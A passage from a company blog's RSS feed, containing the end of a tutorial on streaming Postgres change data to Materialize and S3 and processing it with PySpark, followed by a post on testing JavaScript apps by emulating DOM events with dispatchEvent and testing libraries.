    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; materialize&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;orders&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// stream orders data to Materialize&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; datalake&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;rr&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;dl_raw&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// stream orders data to AWS S3&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that the data is flowing, you can &lt;a href=&quot;https://materialize.com/docs/integrations/metabase/&quot;&gt;use a BI tool like Metabase to query the data in Materialize&lt;/a&gt; for real-time data analysis or to build dashboards.&lt;/p&gt;
&lt;h3&gt;Processing Data from S3 with Spark&lt;/h3&gt;
&lt;p&gt;As data flows into your data lake in real time, you can process and analyze it using Spark. In S3, Turbine stores the data from PostgreSQL as single-line, gzipped JSON, as seen below.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Kappa%20Architecture%20Blog%20Post_Image%203.png&quot; alt=&quot;Kappa Architecture Blog Post_Image 3&quot;&gt;Postgres CDC data in S3&lt;/p&gt;
&lt;p&gt;The schema of the gzipped record looks like the following:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;turbine-demo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;struct&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;fields&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;false&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;int32&quot;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;field&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;optional&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string-property property&quot;&gt;&quot;type&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string&quot;&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token string-property property&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string-property property&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;devaris@devaris.com&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Reading that data in Spark and writing it out to another S3 bucket is straightforward with &lt;a href=&quot;https://spark.apache.org/docs/latest/api/python/&quot;&gt;PySpark&lt;/a&gt;, as seen below.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; pyspark

&lt;span class=&quot;token comment&quot;&gt;# Set up a Spark Session and your S3 config&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; pyspark &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; SparkConf
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; pyspark&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;sql &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; SparkSession

conf &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; SparkConf&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.jars.packages&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;org.apache.hadoop:hadoop-aws:3.2.0&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.aws.credentials.provider&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;org.apache.hadoop.fs.s3a.TemporaryAWSCredentialsProvider&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.access.key&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;YOUR_AWS_ACCESS_KEY&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.secret.key&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;YOUR_AWS_SECRET_KEY&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
conf&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;spark.hadoop.fs.s3a.session.token&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;YOUR_AWS_SESSION_TOKEN&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

spark &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; SparkSession&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;builder&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;config&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;conf&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;conf&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;getOrCreate&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Read the gzipped JSON data from S3&lt;/span&gt;
df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; spark&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;read&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;json&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3a://dl_raw/file.jl.gz&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Do some processing on the dataframe then write to a new bucket in CSV format&lt;/span&gt;
df&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;write&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;format&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;csv&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;option&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;header&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;true&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;save&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3a://dl_processed_csv&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Deploying&lt;/h3&gt;
&lt;p&gt;Now that the application is complete, we can deploy the solution in a single command. The Meroxa Platform sets up all the connections and orchestrates the data in real-time so you don’t have to worry about the operational complexity.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy pg_kappa  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The Meroxa platform and our Turbine SDK take the complexity out of operating and leveraging the Kappa Architecture. With fewer than 20 lines of code, we deployed a solution that enables real-time analytics with Materialize and leveraged Spark’s stream processing for ML, data science, and more in a separate workflow.&lt;/p&gt;
&lt;p&gt;We can’t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;Get started by &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;requesting a free demo of Meroxa&lt;/a&gt;. Your app could also be featured in our Data App Spotlight series. If you’d like to see more data app examples, please feel free to make your request in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Better Test User Interactions in JavaScript Apps with Emulated Events]]></title><description><![CDATA[When automated testing of JavaScript apps, it is key to verify the app state is changing as expected. By emulating the DOM events in automated tests, you get closer to mimicking the app’s behavior accurately.]]></description><link>https://meroxa.com/blog/better-test-user-interactions-in-javascript-apps-w-emulated-events</link><guid isPermaLink="false">https://meroxa.com/blog/better-test-user-interactions-in-javascript-apps-w-emulated-events</guid><dc:creator><![CDATA[Jesse Jordan]]></dc:creator><pubDate>Mon, 29 Aug 2022 23:45:25 GMT</pubDate><content:encoded>&lt;p&gt;For over a decade, single-page web applications have been on the rise and continue to be a popular medium for modern web experiences today. Digital products such as Twitter, Gmail, LinkedIn, and Netflix, as well as &lt;a href=&quot;https://dashboard.meroxa.io&quot;&gt;our dashboard at Meroxa&lt;/a&gt;, are such &lt;strong&gt;JavaScript applications&lt;/strong&gt; and are served to billions of users every day.&lt;/p&gt;
&lt;p&gt;To guarantee the delivery of high-quality software, engineering teams implementing modern web applications must not only dedicate time to the development of new features or the maintenance of already existing code, but also to the verification of application behavior through manual and &lt;strong&gt;automated testing&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;When it comes to automated testing of JavaScript applications, it is key to verify the &lt;strong&gt;application state&lt;/strong&gt; is changing as expected over time. The state of JavaScript applications is defined by a continuous &lt;strong&gt;sequence of user interactions&lt;/strong&gt; and &lt;strong&gt;browser events&lt;/strong&gt;. In some cases, the actual user interaction cannot easily be replicated in a test — but the underlying events may be.&lt;/p&gt;
&lt;p&gt;By &lt;strong&gt;emulating&lt;/strong&gt; the &lt;strong&gt;DOM&lt;/strong&gt; (Document Object Model) &lt;strong&gt;events&lt;/strong&gt; in our automated tests, we get closer to mimicking our app’s behavior accurately. In this article, you’ll learn what DOM events are and how you can leverage them in your testing approach for more reliable test coverage.&lt;/p&gt;
&lt;h2&gt;What is a DOM event?&lt;/h2&gt;
&lt;p&gt;A &lt;a href=&quot;https://www.w3.org/TR/DOM-Level-2-Events/events.html&quot;&gt;DOM event&lt;/a&gt; signals occurrences in a web app, such as a user interaction (e.g. a user hovering over a button element) or another event-triggering action that is unrelated to user behavior (e.g. the browser finishing loading a web page). DOM events can be used to &lt;strong&gt;run&lt;/strong&gt; one or more &lt;strong&gt;functions&lt;/strong&gt; inside of a JavaScript application at a specific point in time — specifically, &lt;strong&gt;whenever the associated DOM event&lt;/strong&gt; is triggered.&lt;/p&gt;
&lt;p&gt;User interactions prompt many of the DOM events in a JavaScript application’s lifecycle. For example, a user may use a mouse or keyboard device to activate a &lt;code class=&quot;language-text&quot;&gt;&amp;lt;button&gt;&lt;/code&gt; element, triggering many DOM events while doing so, including, but not limited to, the &lt;code class=&quot;language-text&quot;&gt;click&lt;/code&gt; event.&lt;/p&gt;
&lt;p&gt;Here’s a typical sequence of the DOM events sent whenever a button is clicked using a mouse device:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;pointerover&lt;/li&gt;
&lt;li&gt;pointerenter&lt;/li&gt;
&lt;li&gt;mouseover&lt;/li&gt;
&lt;li&gt;pointerrawupdate&lt;/li&gt;
&lt;li&gt;pointermove&lt;/li&gt;
&lt;li&gt;mousemove&lt;/li&gt;
&lt;li&gt;pointerdown&lt;/li&gt;
&lt;li&gt;mousedown&lt;/li&gt;
&lt;li&gt;focus&lt;/li&gt;
&lt;li&gt;pointerup&lt;/li&gt;
&lt;li&gt;mouseup&lt;/li&gt;
&lt;li&gt;click&lt;/li&gt;
&lt;li&gt;blur&lt;/li&gt;
&lt;/ul&gt;
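&lt;p&gt;Dispatching synthetic events against the standard &lt;code class=&quot;language-text&quot;&gt;EventTarget&lt;/code&gt; API is what this kind of emulation boils down to. The following minimal sketch (ours; a plain &lt;code class=&quot;language-text&quot;&gt;EventTarget&lt;/code&gt; stands in for a real button element) replays the tail end of the sequence above and records the order in which listeners fire:&lt;/p&gt;

```javascript
// Sketch: emulating a mouse click by dispatching synthetic events
// in order. EventTarget and Event are standard in browsers and
// available globally in modern Node. In a real test the target
// would be an actual DOM element such as a button.
const target = new EventTarget();
const seen = [];

// The tail end of the click sequence listed above.
const sequence = ['pointerdown', 'mousedown', 'focus', 'pointerup', 'mouseup', 'click'];

// Register one listener per event type, as an app would.
for (const type of sequence) {
  target.addEventListener(type, (event) => seen.push(event.type));
}

// Emulate the interaction, event by event.
for (const type of sequence) {
  target.dispatchEvent(new Event(type));
}

console.log(seen.join(' -> '));
// prints "pointerdown -> mousedown -> focus -> pointerup -> mouseup -> click"
```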
&lt;p&gt;In a test environment, e.g. when running our JavaScript application in the context of an automated &lt;a href=&quot;https://jestjs.io/&quot;&gt;Jest&lt;/a&gt; or &lt;a href=&quot;https://qunitjs.com/&quot;&gt;QUnit&lt;/a&gt; test run, it may be helpful for us to emulate such user interactions to verify that the event-driven features we have implemented are working as expected.&lt;/p&gt;
&lt;p&gt;But &lt;em&gt;how&lt;/em&gt; can you assert the sequence of events and associated app state changes in your JavaScript tests? Let’s take a look at an example component.&lt;/p&gt;
&lt;h2&gt;Example: Automated testing of file uploads&lt;/h2&gt;
&lt;p&gt;Imagine we were building an amazing file upload component that allows users to click a button to browse for a file on their machine, select it, and then upload its content to the app.&lt;/p&gt;
&lt;p&gt;If we wrote our app using &lt;strong&gt;&lt;a href=&quot;http://emberjs.com&quot;&gt;EmberJS&lt;/a&gt;&lt;/strong&gt;, as we’re doing for our open-source &lt;a href=&quot;https://github.com/ConduitIO/mx-ui-components&quot;&gt;component library mx-ui-components at Meroxa&lt;/a&gt;, the component may be structured similarly to this:&lt;/p&gt;
&lt;p&gt;And in a similar fashion, we may want to build such a component in a &lt;strong&gt;&lt;a href=&quot;https://reactjs.org/&quot;&gt;React&lt;/a&gt;&lt;/strong&gt; library like this:&lt;/p&gt;
&lt;p&gt;In a production environment, a user can now upload their files using the &lt;code class=&quot;language-text&quot;&gt;&amp;lt;Upload&gt;&lt;/code&gt; component by clicking the &lt;code class=&quot;language-text&quot;&gt;Browse file&lt;/code&gt; button and selecting their file from their local machine.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://blog.meroxa.com/hs-fs/hubfs/findafile-demo.gif?width=1673&amp;#x26;name=findafile-demo.gif&quot; alt=&quot;findafile-demo&quot;&gt;&lt;/p&gt;
&lt;p&gt;In our test suite, natively executing the full user interaction would be impossible: when our tests run in our &lt;strong&gt;continuous integration&lt;/strong&gt; workflow, we won’t have easy access to the file directory of the remote machine from which a file is supposed to be selected for upload.&lt;/p&gt;
&lt;p&gt;Instead of uploading a real file in our automated test, we can &lt;strong&gt;emulate the file upload event&lt;/strong&gt; that results from the user interaction; this way, we can test if any associated event listeners and subsequent state changes in our JavaScript app are working as expected.&lt;/p&gt;
&lt;p&gt;While building a web application using a &lt;strong&gt;JavaScript framework&lt;/strong&gt;, you may benefit from the comfort of using &lt;strong&gt;compatible testing libraries&lt;/strong&gt;, such as &lt;a href=&quot;https://qunitjs.com/&quot;&gt;QUnit&lt;/a&gt;, &lt;a href=&quot;https://github.com/emberjs/ember-test-helpers/blob/master/API.md&quot;&gt;@ember/test-helpers&lt;/a&gt; or &lt;a href=&quot;https://jestjs.io/&quot;&gt;Jest&lt;/a&gt; in combination with &lt;a href=&quot;https://testing-library.com/&quot;&gt;@testing-library/react&lt;/a&gt;, which will make emulating custom events even easier.&lt;/p&gt;
&lt;p&gt;Let’s leverage &lt;em&gt;Ember&lt;/em&gt;’s &lt;code class=&quot;language-text&quot;&gt;triggerEvent&lt;/code&gt; function to test the file upload behavior of our &lt;code class=&quot;language-text&quot;&gt;&amp;lt;Upload /&gt;&lt;/code&gt; component shown earlier:&lt;/p&gt;
&lt;p&gt;In a React app on the other hand, we can assert the same user flow using the handy helper methods from &lt;code class=&quot;language-text&quot;&gt;@testing-library&lt;/code&gt; in a similar manner:&lt;/p&gt;
&lt;h2&gt;Other approaches for testing events in your tests&lt;/h2&gt;
&lt;p&gt;If you don’t have a developer-friendly testing library for your use case, you can create your own testing helper library for easy reuse in many different JavaScript-based projects.&lt;/p&gt;
&lt;h3&gt;Mimicking common user actions in plain JavaScript&lt;/h3&gt;
&lt;p&gt;Many HTML elements have built-in methods for programmatically triggering common user interactions on them, which makes testing user flows more straightforward.&lt;/p&gt;
&lt;p&gt;For example, if we wanted to mock a user clicking a button element, we could emulate this as follows in our integration test:&lt;/p&gt;
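&lt;p&gt;As a sketch (the element is modeled with a bare &lt;code class=&quot;language-text&quot;&gt;EventTarget&lt;/code&gt; so the snippet runs outside a browser; in a real jsdom or browser test you would call &lt;code class=&quot;language-text&quot;&gt;click()&lt;/code&gt; on the actual button element):&lt;/p&gt;

```javascript
// Stand-in for a button: a bare EventTarget with a click() convenience
// method, mirroring how element.click() dispatches a 'click' event.
const button = new EventTarget();
button.click = () => button.dispatchEvent(new Event("click"));

let clicked = false;
button.addEventListener("click", () => {
  clicked = true;
});

// The test emulates the user interaction programmatically.
button.click();
console.log(clicked); // true
```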
&lt;p&gt;Sometimes we would like to assert an application state change in our automated test that is elicited by a DOM event with no corresponding DOM element method (unlike click, which has &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/click&quot;&gt;element.click&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;What if we updated our app state whenever a user started or stopped hovering over the button mentioned in the example above, regardless of whether the button was clicked? In that case, we might want to emulate the &lt;code class=&quot;language-text&quot;&gt;mouseenter&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;mouseleave&lt;/code&gt; events instead and verify that our JavaScript application still behaves as expected.&lt;/p&gt;
&lt;h3&gt;Emulating any DOM event&lt;/h3&gt;
&lt;p&gt;For such test scenarios based on less common DOM events, we can leverage the &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt; API:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The &lt;strong&gt;&lt;code class=&quot;language-text&quot;&gt;dispatchEvent()&lt;/code&gt;&lt;/strong&gt; method of the &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget&quot;&gt;EventTarget&lt;/a&gt; sends an &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/Event&quot;&gt;Event&lt;/a&gt; to the object, (synchronously) invoking the affected &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener&quot;&gt;EventListener&lt;/a&gt;s in the appropriate order.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;from &lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/dispatchEvent&quot;&gt;the MDN docs on &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Any DOM event can be &lt;strong&gt;programmatically triggered&lt;/strong&gt; where needed, by calling the &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt; method on the target element:&lt;/p&gt;
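&lt;p&gt;For example (shown here on a bare &lt;code class=&quot;language-text&quot;&gt;EventTarget&lt;/code&gt; so the snippet also runs under Node; with a real DOM element the calls are identical):&lt;/p&gt;

```javascript
// Listeners registered on the target fire synchronously when the
// matching event is dispatched.
const target = new EventTarget();

const received = [];
target.addEventListener("mouseenter", (event) => received.push(event.type));
target.addEventListener("mouseleave", (event) => received.push(event.type));

// Programmatically trigger the hover sequence.
target.dispatchEvent(new Event("mouseenter"));
target.dispatchEvent(new Event("mouseleave"));

console.log(received); // ['mouseenter', 'mouseleave']
```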
&lt;p&gt;In our file upload component example from above, we could write our own test helper to emulate the feature functionality. Using the &lt;code class=&quot;language-text&quot;&gt;dispatchEvent&lt;/code&gt; method in combination with the &lt;code class=&quot;language-text&quot;&gt;change&lt;/code&gt; event in our test helper util already does the trick:&lt;/p&gt;
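&lt;p&gt;A sketch of such a helper (the helper name and &lt;code class=&quot;language-text&quot;&gt;files&lt;/code&gt; shape are illustrative; the file input is modeled with a bare &lt;code class=&quot;language-text&quot;&gt;EventTarget&lt;/code&gt; to keep the snippet self-contained):&lt;/p&gt;

```javascript
// Hypothetical test helper: emulate selecting a file by setting a
// `files` property on the target and dispatching a 'change' event,
// just as the browser does after a user picks a file.
function triggerFileUpload(target, file) {
  target.files = [file];
  target.dispatchEvent(new Event("change"));
}

// Stand-in for the file input element.
const input = new EventTarget();

let uploadedName = null;
input.addEventListener("change", (event) => {
  uploadedName = event.target.files[0].name;
});

triggerFileUpload(input, { name: "leads.csv" });
console.log(uploadedName); // leads.csv
```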
&lt;h2&gt;That’s a wrap!&lt;/h2&gt;
&lt;p&gt;Whether you’re using a framework or plain old JavaScript to build out your web apps and components, &lt;strong&gt;testing event-driven behavior&lt;/strong&gt; has never been easier. By using testing libraries or comprehensive Web APIs, &lt;strong&gt;emulating events&lt;/strong&gt; in unit and integration tests is a breeze.&lt;/p&gt;
&lt;p&gt;Have thoughts, questions or recommendations on how you can test events in JavaScript? Let us know in the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Meroxa community&lt;/a&gt; or on Twitter at &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;@meroxadata&lt;/a&gt;!&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;mx-ui-components: &lt;a href=&quot;https://github.com/ConduitIO/mx-ui-components&quot;&gt;https://github.com/ConduitIO/mx-ui-components&lt;/a&gt;&lt;/li&gt;
